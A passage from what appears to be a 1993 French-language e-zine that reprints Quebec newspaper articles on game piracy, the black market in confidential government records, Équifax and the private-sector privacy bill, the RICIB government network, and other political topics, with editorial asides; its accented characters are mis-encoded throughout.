‚pileptiques: elle les r‚vŠle, en soumettant les yeux de
l'enfant … une lumiŠre intermittente. Test que pratiquent
les neurologues dans leurs cabinets pour d‚celer une
‚ventuelle propension … l'‚pilepsie. La t‚l‚vision joue
parfois des tours du mˆme genre. Au XIXe siŠcle d‚j…, on
observait une recrudescence des crises d'‚pilepsie dans
les diligences qui empruntaient, les jours de soleil, les
routes bord‚es de platane du sud de la France.
Il faut donc conseiller aux nintendomaniaques de ne pas
jouer trop longtemps, de s'installer dans une piŠce bien
‚clair‚e, etc. Autant de conseils qui figureront …
l'avenir sur les emballages des consoles.


PIRATES

par
G‚rard Petitjean


"Je n'ai jamais achet‚ un jeu. Pourtant je joue presque
tous les jours. Simplement, dŠs qu'on me parle d'un super
logiciel, j'attends qu'un de mes copains me le procure.
En g‚n‚ral, je n'attends pas longtemps..." S‚bastien a
des copains pirates. Pas sur L'Œle de la Tortue: …
Puteaux. Des dieux de l'informatique qui se jouent des
piŠges tendus par les ‚diteurs … ceux qui voudraient
s'approprier leurs oeuvres sans passer par le tiroir-
caisse. Un vrai gang. "Le premier qui voit un jeu, que ce
soit en France, en Angleterre ou aux tats-unis, l'achŠte
et l'envoie par modem aux "crackers" qui vont le
"d‚plomber". Et l…, c'est la course: celui qui casse le
plus vite la protection d'un jeu est reconnu par ses
pairs, il accŠde … des r‚seaux o— il b‚nificiera … son
tour de logiciels d‚plomb‚s..."
S‚bastien a un copain qui fait partie de ces r‚seaux. La
protection la plus coriace qu'il ait rencontr‚e lui a
demand‚ quatre jours d'efforts. G‚n‚ralement, un quart
d'heure suffit. Bien s–r, ces exploits n'arrachent pas de
cris d'admiration aux ‚diteurs de jeux. Pour trois jeux
que nous vendons, affirment-ils, il y en a dix en
circulation. "Ils sont paranos!, disent les journalistes
de "GEN 4", qui connaissent bien leur petit milieu.
"Disons qu'il y a plut“t un jeu copi‚ pour un vendu. Et
toutes ces copies, les ‚diteurs savent trŠs bien qu'ils
ne les auraient jamais vendues. On prend un jeu pirat‚
"pour voir". On conservera la copie si le jeu ne vaut pas
le coup. S'il est bon, si on sent qu'on va passer des
semaines dessus, on l'achŠte."

- 30 -


[ Les deux prochains articles de Michel Venne sont tir‚s
d'une s‚rie d'articles ‚crits pour le quotidien LE
DEVOIR, s‚rie intitul‚e L'TAT SAIT TOUT. La s‚rie dans
son entier m‚rite d'ˆtre lue, soyez-en s–rs, mais nous ne
reproduirons ici, du moins ce mois-ci, que deux articles
parmi tous ceux parus, le premier parce qu'il d‚montre
qu'quifax est une compagnie de crosseurs, et le deuxiŠme
parce que... vous verrez bien... -Blitzkreig ]



Leeched from LE DEVOIR - 11 f‚vrier 1993

DES FONCTIONNAIRES DANS LE MARCH NOIR
DU RENSEIGNEMENT CONFIDENTIEL

par
Michel Venne

Des fonctionnaires paient leurs informateurs
avec des renseignements confidentiels. LE
DEVOIR a tent‚ l'exp‚rience. Ca marche...

Les fichiers de renseignements personnels du gouvernement
sont des paniers perc‚s. Le v‚rificateur g‚n‚ral a d‚j…
mis en lumiŠre les lacunes des systŠmes de s‚curit‚ des
banques de donn‚es. LE DEVOIR a pu exp‚rimenter le march‚
noir du renseignement personnel. C'est, au Qu‚bec, un
march‚ florissant.
Deux enquˆteurs priv‚s, complŠtement ind‚pendants
l'un de l'autre, ont accept‚ de collaborer avec nous. et
trois citoyens cobayes nous ont permis de faire enquˆte
sur eux.
Nous avons fourni … nos deux enquˆteurs le nom et le
num‚ro d'assurance-sociale de nos cobayes.
Quelques jours plus tard, ils nous ont communiqu‚
l'adresse, le num‚ro de t‚l‚phone, la date de naissance
de nos amis ainsi que, le cas ‚ch‚ant, l'ƒge des enfants,
le montant des prestations d'aide sociale et d'assurance-
ch“mage qui leur sont ou leur ont ‚t‚ vers‚es et pendant
combien de temps, le num‚ro d'aide sociale, le num‚ro de
permis de conduire, le contenu du dossier conducteur
(points d'inaptitude) d‚tenu par la Soci‚t‚ de
l'assurance automobile, le contenu de leur dossier … la
commission de la sant‚ et de la s‚curit‚ du travail
(CSST).
Nos cobayes nous ont certifi‚ n'avoir jamais
communiqu‚ avec ces d‚tectives et n'avoir jamais fait
l'objet d'aucune enquˆte dans leur entourage.
Ces renseignements ont ‚t‚ recueillis au sein du
gouvernement.
Lorsque nos deux Sherlock Holmes ont fait leur
rapport, nous leur avons propos‚ de couvrir leurs frais.
Nous imaginions que leurs contacts leur fournissaient ces
renseignements contre r‚mun‚ration. Mais il n'en ‚tait
rien.
Des fonctionnaires fournissent en effet
gracieusement des renseignements confidentiels … des
enquˆteurs priv‚s, en ‚change de leur collaboration.
L'un de nos deux d‚tectives priv‚s … quelques
contacts au service des enquˆtes de l'aide sociale. Ces
contacts, dit-il, lui fournissent le contenu de dossiers
de b‚n‚ficiaires dont ses clients, des avocats
g‚n‚ralement, cherchent … retrouver la trace.
En ‚change, il leur promet de leur fournir des
informations sur des assist‚s sociaux qui font l'objet
d'une enquˆte pour fraude. S'il apprend qu'un assist‚
social travaille au noir, par exemple, il le d‚nonce.
Cet enquˆteur priv‚ … d‚j… ‚t‚ employ‚ du Bureau de
cr‚dit de Montr‚al (quifax). A ce titre, il communiquait
souvent … ses contacts au sein du gouvernement la fiche
de cr‚dit d'un contribuable soup‡onn‚ de fraude. C'est
ainsi qu'il r‚compensait ses informateurs.
En retour, ces commis de l'tat r‚mun‚raient leur
clandestin collaborateur avec des renseignements
personnels appartenant … d'honnˆtes citoyens qui
s'attendent … la confidentialit‚.
Le second d‚tective qui a collabor‚ avec nous
corrobore sans h‚sitation cette version des faits.
"J'aide des fonctionnaires … faire leur travail",
dit-il tout bonnement. Il affirme servir parfois
d'interm‚diaire pour un fonctionnaire de l'aide sociale
qui voudrait v‚rifier une information sur un b‚n‚ficiaire
que possŠde la CSST.
Des fonctionnaires pr‚fŠrent cependant agir contre
espŠces sonnantes et tr‚buchantes et arrondir leurs fins
de mois en acceptant quelques billets sous la table.
L'une de nos sources relate le cas d'un enquˆteur de
l'aide sociale qui fournissait de 75 … 100 dossiers
d'assist‚s sociaux par jour … un collŠgue du bureau de
cr‚dit. Il recevait en retour 1$ par dossier.
D'autres acceptent pour leurs bons services une
bouteille de cognac … No‰l.
Ces liaisons dangereuses existent dans … peu prŠs
tous les organismes publics d‚tenteurs de fichiers
importants. La S–ret‚ du Qu‚bec et son Centre de
renseignement policier, … Parthenais, n'y ‚chappent pas,
selon nos sources.
Dans son bulletin d'information confidentiel de
d‚cembre 1991, le Centre admet candidement devoir
"malheureusement d‚plorer plusieurs bris de s‚curit‚ au
niveau de l,aspect confidentiel des informations
contenues au CRPQ".
Il arrive que des fonctionnaires se font prendre …
ce petit jeu. Et lorsque c'est le cas, la justice ne
s'acharne pas sur le sort du coupable.
Un fonctionnaire de l'assurance-ch“mage a ‚t‚
reconnu coupable en d‚cembre dernier d'avoir vendu (20$
piŠce, pour un magot d'au moins 2000$), des
renseignements personnels sur des ch“meurs … un ami
d‚tective priv‚.
Le tribunal lui a accord‚ une lib‚ration
conditionnelle … un don de 55$ … la Soci‚t‚ canadienne du
cancer...
A la suite d'un reportage du journaliste Normand
Lester … Radio-Canada en octobre dernier, faisant ‚tat
d'un trafic semblable … l'aide sociale, le ministŠre de
la Main-d'oeuvre et de la S‚curit‚ du revenu a suspendu
de ses fonctions un de ses employ‚s pour la dur‚e d'une
enquˆte qui est en cours … la S–ret‚ du Qu‚bec.
La porte-parole du ministre Andr‚ Bourbeau affirme
qu'il s'agit d'un "cas isol‚", que les systŠmes
d'information du ministŠre sont … "toute ‚preuve" … cet
‚gard. Les employ‚s signent un engagement de
confidentialit‚, dit-elle.
Ce n'‚tait pas la premiŠre fois que ce ministŠre
‚tait mis en cause pour bris de confidentialit‚. En 1988,
le ministre Pierre Paradis avait d– d‚clencher une
enquˆte policiŠre sur un trafic de renseignements. Deux
fonctionnaires avaient ‚t‚ poursuivis en justice.
Le pr‚sident de la Commission d'accŠs …
l'information, M. Paul-Andr‚ Comeau, est conscient de
l'existence de ce march‚ noir. "On peut promettre la
confidentialit‚, dit-il en entrevue. Mais on ne pourra
jamais promettre qu'il n'y aura jamais de fraude. Parce
que c'est une composante de la nature humaine."
Si la technologie "amplifie le risque", M. Comeau
rappelle "que les dossiers de papier circulaient,
traŒnaient et se vendaient". Il note toutefois qu'avec le
d‚veloppement des technologies de l'information, les
tats se sont dot‚s de lois pour prot‚ger la vie priv‚e.
Le gouvernement du Qu‚bec, dit-il, "a d‚cid‚ de se
morig‚ner lui-mˆme", en 1982, en se dotant d'une loi …
cette fin, qui n'existait pas avant l'informatique.
Le problŠme, ajoute M. Comeau, c'est que les
organismes opŠrent sans filet. Il donne l'exemple de la
CSST o— on a d‚couvert que les 2000 employ‚s ont accŠs
aux fichiers d'un b‚n‚ficiaire. Les consultations ne sont
pas enregistr‚es. De sorte qu'il est impossible de
rep‚rer la source d'une fuite. L'organisme doit, d'ici
1996, modifier son systŠme pour palier cette lacune.
Dans ses deux derniers rapports annuels, le
v‚rificateur g‚n‚ral du Qu‚bec, M. Guy Breton, identifie
de nombreuses lacunes … la s‚curit‚ des systŠmes
informatiques.
"Il n'y a pas de pr‚occupation quotidienne pour la
s‚curit‚, dit-il en entrevue. Tout le monde n'est pas
convaincu de la n‚cessit‚ de prot‚ger l'information. Il
s,est ‚tabli une confiance que ca va bien, que ces
machines s'autocontr“lent et qu'on ne devrait pas
s'‚nerver avec ca".
De maniŠre g‚n‚rale, M. Breton observe que les gens
ne sont pas assez prudents avec les mots de passe et les
codes qui leur donnent accŠs aux systŠmes. "Les gens se
les prˆtent", dit-il, ou alors ils conservent le mˆme
durant des ann‚es. "Tout le monde sait que le mot de
passe du collŠgue, c'est le nom de sa femme".
M. Breton note que l'information, c'est le pouvoir.
C'est pour cela que le gouvernement est puissant, dit-il.
"Il l'a toute". Mais "quand il la laisse fuir, il y a des
gens qui en profitent et qui se gagnent du pouvoir avec.
La rŠgle, ajoute-t-il, devrait ˆtre qu'on soit tous ‚gaux
devant ce que le gouvernement possŠde."

- 30 -


Leeched from LE DEVOIR - Vendredi 19 f‚vrier 1993

LA LOI SUR LA VIE PRIVE LAISSE DES TROUS
BANTS...ET LE CONSEIL DU PATRONAT S'Y OPPOSE

par
Danny Vear

Le Conseil du patronat s'oppose farouchement au
projet de loi sur la protection des renseignements
personnels dans le secteur priv‚.
Au mieux, il en demande le retrait pur et simple. Au
pire, il croit n‚cessaire que des amendements s‚rieux y
soient apport‚s.
"Le projet de loi 68 va trop loin. Il en demande
trop aux entreprises", a affirm‚ hier le pr‚sident du
Conseil du patronat du Qu‚bec, Ghislain Dufour.
Le CPQ croit que le ministre des Communications,
Laurence Cannon, n'a pas mesur‚ l'impact de son projet.
Ainsi, toutes les entreprises qu‚b‚coises se verraient
imposer un systŠme de protection des renseignements
personnels qui est beaucoup plus strict, complexe et
co–teux que les systŠmes en vigueur dans les autres
provinces canadiennes et dans les autres pays, ‚crit le
Conseil dans son m‚moire pr‚sent‚ … la Commission
parlementaire charg‚e d'examiner le projet de loi.
(...)
Les entreprises devraient constamment tenir … jour
leurs registres de renseignements personnels et veiller
… ce qu'ils soient exacts et complets.
Ghislain Dufour reconnaŒt que certains secteurs de
l'‚conomie ont de mauvaises pratiques en ce qui concerne
l'information sur les citoyens. Ce constat ne doit pas
pousser le gouvernement … r‚glementer tous les secteurs
de l'‚conomie, dit-il.
Le pr‚sident du CPQ s'est port‚ … la d‚fense
d'quifax, firme qui pratique le commerce des
renseignements personnels, pr‚pare des rapports de cr‚dit
aux institutions bancaires qui lui en font la demande et
d‚tient des informations sur environ 4 millions de
Qu‚b‚cois.
Selon lui, il est insens‚ qu'quifax soit oblig‚
d'informer chacune des personnes sur lequel elle d‚tient
des informations de l'existence d'un tel dossier. Le
pr‚sident d'Quifax, Jean-Claude Chartrand, a d‚j…
exprim‚ de s‚rieuses r‚serves … l'endroit du projet de
loi 68.
Enfin, le Conseil s'inquiŠte des nouveaux pouvoirs
de la Commission d'accŠs … l'information, d‚mesur‚s,
selon lui.
Le Conseil du patronat souscrit aux objectifs vis‚s
par le projet de loi.
Il croit toutefois que l'autor‚glementation des
entreprises suffirait … les atteindre.

- 30 -




Leeched from LE DEVOIR - lundi 8 f‚vrier 1993

par
Michel Venne


Big Brother
LE RICIB, OU TOUT SAVOIR SUR N'IMPORTE QUI, N'IMPORTE
QUAND

[suit un graphique d'un r‚seau tellement p‚t‚ que je
d‚fie n'importe qui de reproduire ‡a en ascii]

(l‚gende du graphique: votre nom circule quelque part
dans cette constellation de canaux de communication.)

Le gouvernement du Qu‚bec a autoris‚ la cr‚ation d'une
autoroute ‚lectronique qui reliera tous les ministŠres et
les organismes publics, dont la R‚gie de l'assurance-
maladie ou la Soci‚t‚ de l'assurance automobile.
A un co–t de 20 millions de dollars, Qu‚bec cr‚e un
R‚seau int‚gr‚ de communications informatiques et
bureautiques.
Le Ricib - un super-r‚seau … la fine pointe de
l'informatique - remplacera une quinzaine de r‚seaux qui
sont propres … chacun des ministŠres, reliant Qu‚bec …
Montr‚al et … quelques 200 villes … travers la province.
Il reliera aux centres-serveurs 27 000 micro-ordinateurs
diss‚min‚s sur les pupitres des fonctionnaires.
En somme, ‚crit le ministŠre des Communications, le
Ricb pourrait permettre "… n'importe qui, … partir d'…
peu prŠs n'importe quel terminal, d'avoir accŠs … peu
prŠs … n'importe quelle information dans n'importe quel
ordinateur, peu importe o— l'un et l'autre se trouvent".
L'accŠs au Ricib sera, certes, balis‚ par les lois.
Et des systŠmes de s‚curit‚ empˆcheront l'information de
circuler n'importe comment, nuance le directeur g‚n‚ral
des t‚l‚communications du ministŠre des Communications,
M. Bernard Beauchemin.
Le Ricib est r‚alis‚ en collaboration avec
l'entreprise priv‚e et constitue un exemple probant de la
maniŠre dont le gouvernement veut aider l'industrie des
technologies de l'information … d‚velopper un savoir-
faire exportable.
[Ca serait pas plut“t parce que les twits du gouvernement
n<y connaissent rien? - Blitz]
Le ministŠre des Communications se donne comme
mission de "s'assurer que les grandes pr‚occupations de
l'tat migrent vers le secteur priv‚, mais toujours dans
un but avou‚ de favoriser le d‚veloppement d'une
industrie qu‚b‚coise des communications", expliquait en
mai dernier, lors d'un colloque, la directrice g‚n‚rale
des technologies de l'information du ministŠre, Mme.
Monique Charbonneau.
Le groupe DMR a d‚j… obtenu un contrat de 700 000$
pour la r‚alisation de la conception d‚taill‚e du Ricib.
Un nouvel appel d'offres a ‚t‚ lanc‚ l'automne dernier
pour l'achat ou la location d'‚quipement et la gestion du
r‚seau proprement dit. Sa mise en oeuvre pourrait d‚buter
au printemps.
Ce projet s'insŠre dans un cr‚neau plut“t inoccup‚,
celui des r‚seaux priv‚s et int‚gr‚s de transmission de
donn‚es par paquets.
Pr‚sentement, chaque ministŠre possŠde son propre
r‚seaude t‚l‚communications pour relier entre eux tous
ses bureaux r‚gionaux … son systŠme central. Ricib
fusionne ces systŠmes et permettra de r‚duire la facture
de t‚l‚communications, qui s'‚lŠve … 17 millions par an
pour l'tat.
Les organismes emprunteront la mˆme route en y
acheminant, par paquets, les informations destin‚es …
l'un de ses bureaux. Chaque paquet portera l'adresse du
destinataire. L'ordinateur le dirigera au bon endroit,
par commutation, dans une espŠce de gare de triage
‚lectronique situ‚e … la sortie de l'autoroute.
Le systŠme offrira ‚galement des services de
courrier ‚lectronique, l'‚change ‚lectronique de
donn‚eset l'accŠs … des banques de donn‚es externes. Par
son architecture ouverte, le Ricib pourra s'adapter aux
besoins futurs.

L'AUTOROUTE DES RENSEIGNEMENTS PERSONNELS
1) Qu‚bec se dote d'un r‚seau ‚lectronique reliant tous
les
ministŠres

En d‚pit des avantages administratifs, l'tat a toujours
r‚sist‚ … l'id‚e de cr‚er un immense fichier central de
renseignements sur les citoyens. La hantŒse de Big
Brother fait son oeuvre. mais est-il en train de faire
indirectement ce qu'il n'ose faire ouvertement?
________

DŠs sa naissance, des ‚chantillons du sang et de l'urine
des nouveaux-n‚s sont achemin‚s dans le R‚seau qu‚b‚cois
de m‚decine g‚n‚tique pour analyse: b‚b‚ a son premier
fichier.
Suivront imm‚diatement le registre d'‚tat civil, la
carte d'assurance-maladie, et le fichier … l'hopŒtal.
Hospitalis‚, on lui ouvre un dossier dans un fichier
inconnu du grand public: Med-Echo. On y r‚colte tous les
renseignements sur les soins re‡us, la dur‚e du s‚jour,
les diagnostics. Med-Echo enregistre un million
d'hospitalisations par ann‚e. Le tout est communiqu‚ …
Statistique Canada. B‚b‚ est fich‚.
Plus tard vient l'‚cole: fichiers des r‚sultats aux
‚preuves de fin d'‚tudes. Les loisirs: fichier des
athlŠtes boursiers ou des d‚tenteurs de permis de chasse.
Junior achŠte une auto: fichier des conducteurs
automobiles; fichier des sinistres automobiles. Il met
sur pied une petite business: fichier central des
entreprises... et connait quelques d‚boires: fichier des
individus en faillite.
Fich‚, qu'il est, le citoyen. L'tat du Qu‚bec
possŠde … lui seul plus de 14 000 fichiers de
renseignements nominatifs, qui permettent d'identifier la
personne, dont une soixantaine contiennent des
informations sur 100 000 individus ou plus.
C'est devenu un clich‚ de dire que l'tat sait tout.
Mais l'tat sait tout en piŠces d‚tach‚es. Et,
malgr‚ les tentations ‚videntes au plan administratif,
aucun gouvernement n'a encore os‚ franchir le pas de
r‚unir, dans un grand fichier central, tous ces
renseignements sur les citoyens. On a peur de Big
Brother.
Mais on pourrait bient“t en arriver l….
"Ce qui n'a jamais pu ˆtre r‚alis‚ ouvertement et
directement, est en train de l'ˆtre indirectement", ‚crit
dans un rapport publi‚ en d‚cembre, le chien de garde de
la vie priv‚e au Qu‚bec, le pr‚sident de la Commission
d'accŠs … l'information Paul-Andr‚ Comeau.
On le fait "de fa‡on presque invisible pour le
commun des mortels, grƒce au d‚veloppement des r‚seaux
informatiques qui permettent la mise en r‚seaux de
banques de donn‚es".
Peu de gens savent que ces renseignements les
concernant circulent entre les diff‚rents organismes et
les ministŠres: donnez une adresse … la R‚gie des rentes;
elle se retrouve le lendemain dans le fichier de la
Soci‚t‚ d'assurance-automobile".
Vous croyiez donner une information pour obtenir en
retour un diplome, un permis, un chŠque ou un
certificat:le mˆme renseignement servira … une recherche
m‚dicale, … un inventaire des d‚crocheurs scolaires, …
vous retracer si le fisc est … vos trousses.
Un diagramme in‚dit que nous publions ci-contre [mon
cul! -Blitz] montre une constellation de canaux de
communication; un enchevˆtrement inextricable
d'organismes du gouvernement du Qu‚bec qui savent des
choses sur vous, et conversent entre eux.
On estime a 20 000 le nombre de circuits par
lesquels circulent … votre insu, des renseignements
personnels … votre sujet.
Un ministŠre peut, s'il le juge n‚cessaire,
communiquer un renseignement sans votre consentement.
L'appariement des banques de donn‚es
gouvernementales est un geste entr‚ dans les moeurs: mˆme
le Directeur g‚n‚ral des ‚lections songe … y recourir
pour tenir … jour une future liste ‚lectorale permanente,
grƒce … laquelle on pourrait ‚liminer le recensement des
‚lecteurs qui coute chaque fois 20 millions.
Le Protecteur du citoyen, M. Daniel Jacoby,
pourtant trŠs pr‚occup‚ du respect de la vie priv‚e,
n'‚chappe pas … la vague: il a demand‚ l'autorisation,
qui lui a ‚t‚ refus‚e, de mettre en r‚seau, pour son
usage, tous les grands fichiers que possŠde le
gouvernement.
Les r‚cents d‚veloppements procŠdent de plusieurs
logiques: efficacit‚ de la gestion, r‚duction des co–ts,
contr“le, chasse aux fraudeurs.
Le gouvernement ne cache pas son d‚sir, non plus, de
d‚velopper … partir de ses propres besoins, une expertise
priv‚e et exportable dans le domaine d'avenir des
technologies de l'information, qui forment l'une des
grappes industrielles. Tout comme on a mis au monde
l'ing‚nierie qu‚b‚coise avec les grands projets
hydro‚lectriques. (...)

- 30 -




Leeched from LA PRESSE - Jeudi 25 f‚vrier 1993

QUIFAX FAIT L'OBJET D'UN PORTRAIT PEU
DIFIANT EN COMMISSION PARLEMENTAIRE


par
Gilles Normand


quifax Canada, compagnie sp‚cialis‚e dans la
constitution de dossiers de cr‚dits et qui possŠde des
donn‚es sur plus de 15 millions de Canadiens, a fait
l'objet d'un portrait peu ‚difiant, hier, devant la
commission parlementaire qui ‚tudie le projet de loi sur
la protection des renseignements personnels dans le
secteur priv‚.
La directrice de l'Association coop‚rative
d'‚conomie familiale du Centre de Montr‚al (ACEF-Centre),
Mme Louise Rozon, a en effet soulev‚ quatre cas de
consommateurs qui ont eu … se plaindre du traitement de
leur dossier par quifax, traitement montrant que les
inqui‚tudes qu'entretiennent nombre de citoyens quant aux
pratiques li‚es … la cueillette et … l'utilisation des
renseignements personnels.
Le t‚moignage de Mme Rozon n'a pas laiss‚ insensible
le parrain du projet de loi 68, le ministre Lawrence
Cannon, qui s'est "engag‚" … analyser trŠs attentivement
comment donner au projet les moyens de restreindre la
cueillette de renseignements … caractŠre personnel.

² Un consommateur identifi‚ comme M. Beauregard,
ayant constat‚ que trois entreprises avec lesquelles il
n'avait jamais fait affaire avaient consult‚ son dossier
de cr‚dit, a demand‚ des explications … quifax. Selon
Mme Rozon, il s'est fait r‚pondre qu'on avait pas … lui
donner de preuves selon lesquelles il aurait ou non donn‚
son consentement.
Mr. Beauregard, ayant constat‚ qu'une entreprise
avait fait ins‚rer de fausses informations dans son
dossier de cr‚dit, n'a pu obtenir correction ni de la
compagnie ni d'quifax. Son dossier est entre les mains
d'un avocat.

² Un deuxiŠme individu, du nom de M. Aubry, a
consult‚ son dossier aprŠs qu'on lui eut refus‚ un prˆt.
Il a constat‚ que la seule information qui s'y trouvait
faisait ‚tat d'un jugement rendu en 1988 relativement …
une dette de 240 $ qu'il avait rembours‚ au complet.
Preuves … l'appui, il a demand‚ … quifax d'ajouter
d'autres donn‚es, relativement … un prˆt de 13 000 $
rembours‚ sans retard de mˆme que d'un autre prˆt de 3
000 $ ‚galement rembours‚ honorablement. quifax, selon
ACEF-Centre, a refus‚, ne permettant pas ainsi … M. Aubry
d'am‚liorer la cote de son cr‚dit, et le for‡ant …
recourir … l'endossement d'un parent pour une nouvelle
transaction.

² Un M. Cloutier, qui avait perdu sa cause lorsqu'il
avait us‚ de son droit de contester devant les tribunaux
un compte de 300 $ que lui r‚clamait la p‚troliŠre Esso,
avait vu son cr‚dit afflig‚ de la cote 9, la plus
mauvaise qui soit. Bien qu'Esso ait demand‚ … quifax de
retirer cette cote, rien n'y fit. M. Cloutier n'a eu
droit d'apporter qu'un commentaire … cette inscription.

² Un M. Langlais n'a pu obtenir un prˆt de la Banque
Royale parce que son dossier de cr‚dit faisait ‚tat d'une
dette de 224 $ envers une compagnie d'assurances. quifax
n'a pas voulu retirer cette donn‚e du dossier de M.
Langlais, en d‚pit des d‚marches en ce sens de la
compagnie d'assurances.

Pr‚sentant un m‚moire commun avec la F‚d‚ration
nationale des associations de consommateurs du Qu‚bec, la
directrice d'ACEF-Centre a indiqu‚ que son organisme est
devenu membre d'Quifax, … l'automne de 1991, dans le
cadre d'une enquˆte. Elle a alors constat‚ que "n'importe
qui peut obtenir des renseignements confidentiels en
payant les frais d'inscription de 60 $ exig‚s par
quifax, et qu'aucun contr“le n'est exerc‚ sur le
membership de cette entreprise".
Mme Rozon a ajout‚ qu'il suffisait ensuite d'un coup
de t‚l‚phone pour transmettre le nom et l,adresse de
quelqu'un pour obtenir en cinq minutes son dossier de
cr‚dit et 24 heures plus tard son exp‚rience bancaire.
"Toutes ces informations pouvaient nous ˆtre transmises
sans le consentement de cette personne et sans qu'elle le
sache", soutient-elle.
Elle a dit s'‚tonner … la lecture du projet de loi
que les agents de renseignements personnels obtiennent si
facilement des autorisations pour exercer leurs
activit‚s. "Aucun droit payable, aucun contr“le quand …
leur comp‚tence, et quand … leur capacit‚ … administrer
leurs entreprises", a-t-elle d‚plor‚, sugg‚rant un
encadrement coh‚rent des pratiques des agents.
Les ACEF s'inquiŠtent que les recours mis … la
disposition des consommateurs "soient minimes, tout comme
les sanctions imposables aux entreprises".
"Le consommateur doit savoir qu'on recueille des
renseignements, qui les recueille et pourquoi et qui les
d‚tient. La loi doit aussi assurer que les renseignements
recueillis sont indispensables et qu'ils servent
uniquement … des fins pr‚cises et pr‚-‚tablies, que ces
renseignements sont recueillis … des fins et par des
moyens l‚gaux et loyaux. Et le consommateur doit
conserver un contr“le sur les informations qui le
concernent, de mˆme qu'il doit avoir l'assurance que ces
informations sont d‚truites lorsqu'elles ne sont plus
indispensables … un dossier", a propos‚ la directrice
d'ACEF-Centre.
La FNACQ et l'ACEF-Centre ont soumis un train de 70
recommandations … la commission.

- 30 -


Leeched from LE SOLEIL - 25 f‚vrier 1993

ETRE DISSIDENT

par
Jacques Gagn‚


"La libert‚, c'est un bien grand mot. Les artistes,
les r‚volutionnaires et les vrais chr‚tiens en vivent et
en meurent".
Simonne Monet-Chartrand,
Journal intime, 1978

Le droit … la dissidence est-il reconnu dans une
soci‚t‚ d‚mocratique comme la n“tre? Les individus
militant dans des organisations politiques peuvent-ils
esp‚rer exprimer leurs convictions personnelles sans ˆtre
esclaves de la ligne orthodoxe de leur parti et sans
craindre constamment d'y ˆtre expuls‚s, sanctionn‚s d'une
position originale et non partisane?
Ce droit … la dissidence est, implicitement, pr‚vu
… l'article 7 de la Charte canadienne des droits et
libert‚s, laquelle ‚nonce que "chacun a droit … la
libert‚ de sa personne..." Les objecteurs de conscience
font appel … la libert‚ de conscience et de religion en
vertu de l'article 2 de la mˆme charte. La magistrature
y d‚couvre quotidiennement la source de son inspiration
et de son renouvellement.
La Commission-Jeunesse du Parti Lib‚ral, … son
congrŠs des 6 et 7 f‚vrier dernier, nous a livr‚ un
spectacle navrant en r‚v‚lant la docilit‚ de jeunes de
18-20 ans … l'‚gard d'une philosophie politique dessin‚e
par leurs aŒn‚s et leur proposant, comme seul id‚al, la
voie de la raisonnabilit‚.
Pourtant, l'essentiel de la jeunesse se situe dans
la passion et l'intransigeance en se m‚fiant des
comportements gr‚gaires. Toute vell‚it‚ pour le
compromis, … cet ƒge, risque de se traduire t“t ou tard
par une scl‚rose de la pens‚e et de l'action, st‚rilisant
d'avance tout bain de jouvence.
Il n'est pas demand‚ … tous les jeunes d'emprunter
le profil r‚volutionnaire. La r‚flexion, en exergue, de
madame Simonne Monet-Chartrand le laisse sous-entendre.
Mais tous les jeunes, dignes de ce nom, devraient pouvoir
t‚moigner en y substituant le vocable de contestataire.
La contestation est susceptible de renfermer toutes les
aspirations d'une jeunesse fougueuse dans un projet de
soci‚t‚ exempt de toute m‚diocrit‚.


- 30 -




Leeched from LA PRESSE - Lundi 22 f‚vrier 1993

FALARDEAU DFEND SON FILM SUR OCTOBRE 70,
QU'IL DIT "FIDELE A L'HISTOIRE"

par
Gilles Paquin


Avant mˆme d'avoir tourn‚ les premiŠres images de son
film OCTOBRE, le cin‚aste Pierre Falardeau a ‚t‚ accus‚
hier de chercher … glorifier le FLQ avec des fonds
f‚d‚raux.
Selon le s‚nateur lib‚ral Philip Gigantes, le
sc‚nario de Falardeau pr‚sente les assassins de Pierre
Laporte comme des personnages "sympathiques" alors qu'ils
ne l'‚taient pas. L'tat f‚d‚ral doit refuser de financer
un tel projet.
"Mon objection principale … l'‚gard de ce film,
c'est qu'il met des mots dans la bouche de Pierre
Laporte, des choses ‚pouvantables, alors qu'il n'est pas
ici pour se d‚fendre", a d‚clar‚ M. Gigantes … La Presse.

Le projet du cin‚aste Pierre Falardeau raconte
l'enlŠvement et la mort de l'ancien ministre du Travail
Pierre Laporte, en octobre 1970. Il repose sur les
rapports de diff‚rentes commissions d'enquˆte et sur le
livre POUR EN FINIR AVEC OCTOBRE, de Francis Simard, un
des ravisseurs.
Le livre est paru chez Stank‚, en 1982, et l'Office
national du film a pay‚ 9 000$, en 1984, pour acqu‚rir
les droits d'auteur en vue d'en tirer un film. Le
manuscrit dort sur les tablettes depuis, et falardeau
s'en est inspir‚ pour ‚crire son propre sc‚nario,
OCTOBRE. T‚l‚film Canada a d‚j… vers‚ 50 000$ … Falardeau
pour assurer la bonne marche de son oeuvre.
"Le sc‚nario ne travestit aucunement les faits; il
est tout … fait fidŠle … l'histoire. Le condamner …
l'avance, c'est refuser de regarder la r‚alit‚ en face",
a comment‚ le r‚alisateur, hier.
Selon Pierre Falardeau, le s‚nateur Gigantes sait
trŠs bien que tous les films produits au Canada comptent
sur le financement des organismes publics tels que
T‚l‚film, l'ONF et la SOGIC. Priver une production de ces
sources revient … imposer une censure de fait, dit-il.
"Je n'ai aucune objection … ce que M. falardeau
fasse son film avec des fonds priv‚s. Je ne propose pas
d'‚tablir la censure, mais il y a des sujets que le
gouvernement f‚d‚ral n'a pas … subventionner" r‚plique
Gigantes.
Pour Falardeau, le peuple du Qu‚bec et celui du
Canada ont le droit de savoir ce qui s'est pass‚ pour
d‚cider ensuite librement ce qu'ils doivent en penser.
"Il n'est pas n‚cessaire qu'un politicien vienne
d‚cider … leur place", dit-il.
"Quand les gens verront ce film, je ne crois pas
qu'ils applaudiront … la mort de Laporte. Il s'agit d'un
t‚moignage, tir‚ de nombreuses sources, expliquant
comment les choses se sont pass‚es sur la rue Armstrong
(… St-Hubert, lieu de la mort du ministre)", affirme
Falardeau.
C'est pr‚cis‚ment ce qui irrite Gigantes puisque,
dit-il, les seuls t‚moins sont les responsables de la
mort de Laporte. A ses yeux, ont permet ainsi aux
assassins du ministre de faire de l'argent avec leur
crime.
"Cet ‚pisode de notre histoire nous interpelle
encore et personne ne reste froid devant le sc‚nario,
mais ce n'est pas une raison pour l'occulter", soutient
Falardeau.
"Je n'ai pas entendu la voix de M. Gigantes lorsque
la CBC a tourn‚ une s‚rie t‚l‚vis‚e sur la Crise
d'octobre, ou encore lorsque Robin Spry a fait un film
sur le mˆme sujet avec des fonds de l'ONF", dit-il.
Nomm‚ au S‚nat par Pierre Trudeau, Gigantes dit
qu'on le qualifie souvent de "trudeaucrate" parce qu'il
